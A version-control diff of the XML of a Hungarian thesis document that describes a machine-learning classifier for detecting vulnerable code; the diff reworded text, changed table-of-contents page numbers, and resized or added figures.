-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> megalkotva ezzel a program gépi tanulási modelljét.</w:t>
+        <w:t>a paraméterben megadott tanító és tesztelő adatok alapján képzi és értékeli ki a szintén paraméterbeli osztályozót.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Kimenet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> test_bmodel által visszaadott metrika</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, valamint kiírja, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a ciklus hanyadik futásnál jár</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, a korábban említett metrikát és az osz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ályozó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18258,10 +18396,30 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a paraméterként megadott osztályozóval </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">becslést ad a paraméterként megadott </w:t>
+        <w:t xml:space="preserve">becslést ad a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">szintén </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">megadott </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18296,27 +18454,55 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Kiírja többek között annak a valószínűségét, hogy a vektor sérülékeny, annak a valószínűségét, hogy nem sérülékeny </w:t>
+        <w:t xml:space="preserve"> Kiírja többek között </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
+        <w:t xml:space="preserve">az osztályozót, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>ennek fényében az osztályozás eredményét.</w:t>
+        <w:t>az osztályozás eredményét</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>annak a valószínűségét, hogy a vektor sérülékeny</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> valószínűségét, hogy nem sérülékeny.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> A 3.</w:t>
       </w:r>
       <w:r>
@@ -18345,7 +18531,21 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">s ábra első három </w:t>
+        <w:t xml:space="preserve">s ábra </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>utolsó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> három </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18374,14 +18574,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="526B0DE2" wp14:editId="70008578">
-            <wp:extent cx="2660650" cy="1497248"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
-            <wp:docPr id="2" name="Kép 2" descr="A képen asztal látható&#10;&#10;Automatikusan generált leírás"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65A3497D" wp14:editId="0FB8D669">
+            <wp:extent cx="4468820" cy="1695450"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+            <wp:docPr id="17" name="Kép 17"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -18389,17 +18588,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="2" name="Kép 2" descr="A képen asztal látható&#10;&#10;Automatikusan generált leírás"/>
+                    <pic:cNvPr id="1" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -18407,7 +18600,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2667178" cy="1500921"/>
+                      <a:ext cx="4492620" cy="1704480"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -18721,7 +18914,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>rt első két sor valószínűség</w:t>
+        <w:t xml:space="preserve">rt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>utolsó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> két sor valószínűség</w:t>
       </w:r>
       <w:r>
         <w:rPr>

</xml_diff>

<commit_message>
Fix a bug in vectorizer.py and remove target files
</commit_message>
<xml_diff>
--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -1724,7 +1724,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1798,7 +1798,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1872,7 +1872,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1963,7 +1963,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2055,7 +2055,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2145,7 +2145,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2235,7 +2235,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2326,7 +2326,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2419,7 +2419,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2510,7 +2510,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2603,7 +2603,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2695,7 +2695,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2787,7 +2787,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2879,7 +2879,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2971,7 +2971,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3063,7 +3063,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3156,7 +3156,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3249,7 +3249,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3340,7 +3340,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>18</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3431,7 +3431,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3505,7 +3505,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>23</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3579,7 +3579,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>24</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3653,7 +3653,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>25</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3727,7 +3727,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>26</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16492,6 +16492,12 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve">, amelyeket megkülönböztetünk egymástól </w:t>
       </w:r>
       <w:r>
@@ -16604,13 +16610,25 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> A paraméterek változókba helyezésén kívül még inicializál</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>va van egy számláló (</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ez utóbbit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a kód automatikusan számolja ki</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> úgy, hogy későbbiekben az </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16618,13 +16636,25 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>word_freqs</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>), két szótár (</w:t>
+        <w:t>X</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vektorok ~10%-a csorduljon túl az értéken. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A paraméterek változókba helyezésén kívül még inicializál</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>va van egy számláló (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16632,7 +16662,37 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>word2index, indextoword</w:t>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>), két szótár (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word2index, index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16656,13 +16716,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17169,7 +17223,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> hossza kevesebb, mint a </w:t>
+        <w:t xml:space="preserve"> hossza </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">kevesebb, mint a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17207,14 +17268,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a vektorok hossza </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>egységes marad.</w:t>
+        <w:t xml:space="preserve"> a vektorok hossza egységes marad.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17298,10 +17352,10 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D9F5D49" wp14:editId="1BAC2234">
-            <wp:extent cx="3553132" cy="1866900"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-            <wp:docPr id="3" name="Kép 3"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="254682E4" wp14:editId="3C00B6D2">
+            <wp:extent cx="3638550" cy="1944127"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="18" name="Kép 18"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -17321,7 +17375,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3560234" cy="1870631"/>
+                      <a:ext cx="3654117" cy="1952445"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -18169,6 +18223,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">test_bmodel: </w:t>
       </w:r>
       <w:r>
@@ -18247,14 +18302,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>kód sérülékenységéről van sz</w:t>
+        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy kód sérülékenységéről van sz</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18461,21 +18509,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">az osztályozót, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>az osztályozás eredményét</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve">az osztályozót, az osztályozás eredményét, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18574,6 +18608,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -19004,7 +19039,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Emellett további információkat is szolgáltat többek között a</w:t>
+        <w:t xml:space="preserve"> Emellett </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>további információkat is szolgáltat többek között a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19048,6 +19090,16 @@
         </w:rPr>
         <w:t>, valamint megjeleníti a korábban megadott kódot és a program futási idejét.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19139,7 +19191,136 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">meghatározza azt, hogy a kód milyen valószínűséggel sérülékeny. </w:t>
+        <w:t xml:space="preserve">meghatározza azt, hogy milyen valószínűséggel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tartozik a sérülékeny és nem sérülékeny osztályba.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="dto3"/>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C1E08E4" wp14:editId="27480BEA">
+            <wp:extent cx="4572000" cy="2743200"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="Diagram 3">
+              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E819C3E-FB91-491C-857B-CEF457AAEF63}"/>
+                </a:ext>
+              </a:extLst>
+            </wp:docPr>
+            <wp:cNvGraphicFramePr/>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
+                <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId18"/>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>4.1-es ábra:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="613C2654" wp14:editId="5B974865">
+            <wp:extent cx="4572000" cy="2743200"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="16" name="Diagram 16">
+              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1703B93-3F32-45C6-B558-B9193F0D28C8}"/>
+                </a:ext>
+              </a:extLst>
+            </wp:docPr>
+            <wp:cNvGraphicFramePr/>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
+                <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId19"/>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">4.2-es ábra: </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20025,7 +20206,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18" cstate="print">
+                    <a:blip r:embed="rId20" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -20117,7 +20298,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19" cstate="print">
+                    <a:blip r:embed="rId21" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -20200,9 +20381,9 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="281962E8" wp14:editId="0296E34E">
-            <wp:extent cx="4320000" cy="2543040"/>
-            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="281962E8" wp14:editId="0B520AD8">
+            <wp:extent cx="4103251" cy="2317750"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
             <wp:docPr id="14" name="Kép 14"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -20214,26 +20395,33 @@
                     <pic:cNvPr id="14" name="Kép 14"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId20" cstate="print">
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId22" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                         </a:ext>
                       </a:extLst>
                     </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
+                    <a:srcRect l="4999" b="8841"/>
+                    <a:stretch/>
                   </pic:blipFill>
-                  <pic:spPr>
+                  <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4320000" cy="2543040"/>
+                      <a:ext cx="4104058" cy="2318206"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -20266,344 +20454,20 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>TODO</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:sectPr>
-          <w:headerReference w:type="default" r:id="rId21"/>
-          <w:footerReference w:type="default" r:id="rId22"/>
-          <w:headerReference w:type="first" r:id="rId23"/>
-          <w:pgSz w:w="11906" w:h="16838"/>
-          <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
-          <w:cols w:space="708"/>
-          <w:titlePg/>
-          <w:docGrid w:linePitch="360"/>
-        </w:sectPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
